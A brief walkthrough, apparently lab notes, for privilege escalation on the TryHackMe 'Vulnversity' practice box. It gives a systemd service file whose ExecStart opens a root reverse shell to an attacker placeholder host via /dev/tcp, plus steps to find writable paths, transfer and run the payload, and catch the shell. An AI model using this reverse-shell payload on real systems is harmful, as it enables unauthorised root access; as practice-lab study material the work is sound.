Vulnversity (Privilege Escalation)

Misconfigured Permissions — sudo/SUID

Practice box https://tryhackme.com/room/vulnversityarrow-up-right

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find files/directories that writable

find -type f -maxdepth 2 -writable

or

find -type d -maxdepth 2 -writable

2. Transfer the payload(There might be other ways)

Init the target listening to the port

Send the file to target

3. Start listening on the 9999

4. Execute the payload(assume the file is under /var/tmp)

5. The listening 9999 would give you the root

Expand Knowlege

https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directoryarrow-up-right

https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/arrow-up-right

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49arrow-up-right

Last updated